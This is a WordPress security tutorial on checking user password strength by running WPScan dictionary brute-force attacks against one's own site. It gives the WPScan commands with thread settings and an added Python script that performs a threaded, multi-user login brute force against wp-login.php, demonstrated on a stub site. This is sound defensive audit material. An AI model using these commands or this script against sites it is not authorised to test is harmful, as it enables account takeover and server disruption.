As a WordPress site administrator you are responsible for your site’s security. Most probably you have already done a lot to beef up WordPress security, but what about the users? Are they all using a strong password? Typically users are not fond of strong passwords, and the only way you can really ensure they use strong passwords is by enforcing WordPress password policies.
Even if you use a plugin to enforce strong user passwords on your site, it is still recommended to do the occasional check and scan your site for weak passwords. It is like launching a controlled brute force attack against your WordPress site. This article explains how to use the free WPScan tool to do such a scan.
WordPress Users Password Dictionary
To launch a password strength test with the WPScan tool you need a good password dictionary. WP White Security.com has a WordPress user password dictionary which contains one million commonly used passwords. Download the WordPress Password Dictionary to use it in your WordPress password security audits.
Checking the Password Strength of a Single User with WPScan
If you already know the username, use the command below to check the strength of that user's WordPress password with the WPScan WordPress Security Scanner:
ruby wpscan.rb --url www.local.com --wordlist wpw_pwd_dictionary.txt --username admin
The above WPScan command and arguments are explained below (these are the option names of the WPScan version this article was written for; WPScan 3.x renamed them to --passwords, --usernames and --max-threads):
--url: This argument specifies the URL of the target WordPress site. In this example the password brute force attack is launched against www.local.com.
--wordlist: This argument specifies the password dictionary file. In this example the dictionary is wpw_pwd_dictionary.txt. A bare file name is resolved relative to the directory you run WPScan from, so you only need a full path when the dictionary lives somewhere else.
--username: This argument specifies the WordPress username to test. In our example the password brute force attack is launched against the admin account.
The screenshot below shows the output of the WPScan tool when starting the password brute force attack against the admin WordPress user. It also shows the result of the scan: the admin account was using the password adminpass.
A WPScan WordPress password brute force attack can be slow, especially with a large password dictionary like ours, because every candidate password is a separate login request. To speed up the process you can configure WPScan to send several requests concurrently with the --threads argument. In the example below we launch a password brute force attack with WPScan using 50 threads.
ruby wpscan.rb --url www.local.com --wordlist wpw_pwd_dictionary.txt --username admin --threads 50
WP White Security.com Webmaster Tip: Every thread is another concurrent login request, and each attempt costs the server a password hash check, so a high thread count increases the load on your website and might disrupt its operation. Start with a low thread count and raise it only while you can watch the server load. Be careful.
Password Strength Test of Multiple WordPress Users with WPScan
To check the password strength of multiple or all of the WordPress users with the WPScan WordPress Security Scanner, use the same command as in the previous examples but without the --username argument. WPScan then enumerates the site's users itself and tests every one of them against the dictionary. Example follows:
ruby wpscan.rb --url www.local.com --wordlist wpw_pwd_dictionary.txt
If the target WordPress site has a large number of users, the password brute force attack / password strength check might take a very long time and might affect the performance of the website or blog. In such a case it is recommended to first enumerate the WordPress users with WPScan (the --enumerate u option) and then pick the users whose password strength you want to check, running the single-user command for each of them.
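As an added example (not from the original article and not WPScan's own code), the following Python script performs the same controlled audit WPScan runs in both cases above: a single-user dictionary attack with a configurable thread count, and the multi-user variant driven by a list of enumerated usernames. It posts the fields of the stock wp-login.php form, sends the test cookie WordPress insists on, and judges success the way WordPress signals it (a 302 plus a wordpress_logged_in_ cookie). The site www.local.com, the accounts, the wordlist and the SAMPLE_SITE stub transport are constructed for illustration; against a real site you would supply an HTTP client as the transport.

```python
"""Controlled WordPress password audit in the manner of WPScan's brute force.
Added example, not code from the article or from WPScan. Assumes a stock
wp-login.php (no CAPTCHA, 2FA or lockout plugin) and a caller-supplied HTTP
transport, so it runs offline against the constructed stub below."""
import threading
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlencode


@dataclass
class Response:
    status: int
    set_cookie: List[str] = field(default_factory=list)  # raw Set-Cookie values


# (url, request headers, form body) -> Response, e.g. a wrapper around requests.post
Transport = Callable[[str, Dict[str, str], bytes], Response]

# wp-login.php answers "Cookies are blocked" unless this cookie accompanies
# testcookie=1, so every attempt sends it (WPScan does the same).
TEST_COOKIE = "wordpress_test_cookie=WP+Cookie+check"


def login_body(username: str, password: str) -> bytes:
    """Form fields exactly as the stock wp-login.php login form submits them."""
    return urlencode({"log": username, "pwd": password, "wp-submit": "Log In",
                      "redirect_to": "/wp-admin/", "testcookie": "1"}).encode()


def login_succeeded(resp: Response) -> bool:
    """Good login: 302 that sets wordpress_logged_in_<hash>.
    Bad login: the form is re-rendered with 200 and no auth cookie."""
    return resp.status == 302 and any(
        c.startswith("wordpress_logged_in_") for c in resp.set_cookie)


@dataclass
class AuditResult:
    username: str
    password: Optional[str]  # None: nothing in the dictionary matched
    attempts: int            # login requests actually sent for this user


def audit_user(transport: Transport, base_url: str, username: str,
               wordlist: Iterable[str], threads: int = 1) -> AuditResult:
    """Try every dictionary entry for one user; `threads` mirrors --threads."""
    url = base_url.rstrip("/") + "/wp-login.php"
    headers = {"Content-Type": "application/x-www-form-urlencoded",
               "Cookie": TEST_COOKIE}
    found: List[str] = []
    stop, lock, attempts = threading.Event(), threading.Lock(), 0

    def attempt(password: str) -> None:
        nonlocal attempts
        if stop.is_set():  # another thread already hit the password
            return
        resp = transport(url, headers, login_body(username, password))
        with lock:
            attempts += 1
            if login_succeeded(resp) and not found:
                found.append(password)
                stop.set()

    with ThreadPoolExecutor(max_workers=max(1, threads)) as pool:
        list(pool.map(attempt, wordlist))  # list() surfaces transport errors
    return AuditResult(username, found[0] if found else None, attempts)


def audit_users(transport: Transport, base_url: str, usernames: Iterable[str],
                wordlist: List[str], threads: int = 1) -> Dict[str, AuditResult]:
    """The no --username case: run the audit for every enumerated user."""
    return {u: audit_user(transport, base_url, u, wordlist, threads) for u in usernames}


def fake_wordpress(valid: Dict[str, str]) -> Transport:
    """Constructed stand-in for a site; `valid` maps username -> real password.
    Reproduces the three wp-login.php outcomes: cookie error, failure, success."""
    def transport(url: str, headers: Dict[str, str], body: bytes) -> Response:
        form = {k: v[0] for k, v in parse_qs(body.decode()).items()}
        if form.get("testcookie") == "1" and "wordpress_test_cookie" not in headers.get("Cookie", ""):
            return Response(200)  # "Cookies are blocked" page, no login attempted
        if valid.get(form.get("log")) == form.get("pwd"):
            return Response(302, ["wordpress_logged_in_5f3c=" + form["log"] + "|...; path=/"])
        return Response(200)      # form re-rendered with "incorrect password"
    return transport


# Constructed wordlist and site so the audit can run without a real target.
SAMPLE_WORDLIST = ["123456", "password", "qwerty", "adminpass", "letmein", "wordpress"]
SAMPLE_SITE = fake_wordpress({"admin": "adminpass", "editor": "letmein", "author": "Tr0ub4dor&3"})

if __name__ == "__main__":
    results = audit_users(SAMPLE_SITE, "http://www.local.com",
                          ["admin", "editor", "author"], SAMPLE_WORDLIST, threads=4)
    for r in results.values():
        print(f"{r.username}: {r.password or 'not found'} ({r.attempts} attempts)")
```

With a single thread the attempts count for a user equals the position of the password in the dictionary, and an account whose password is absent (author above) costs a full pass over the list; with several threads the count varies, which is the same trade-off the --threads argument makes.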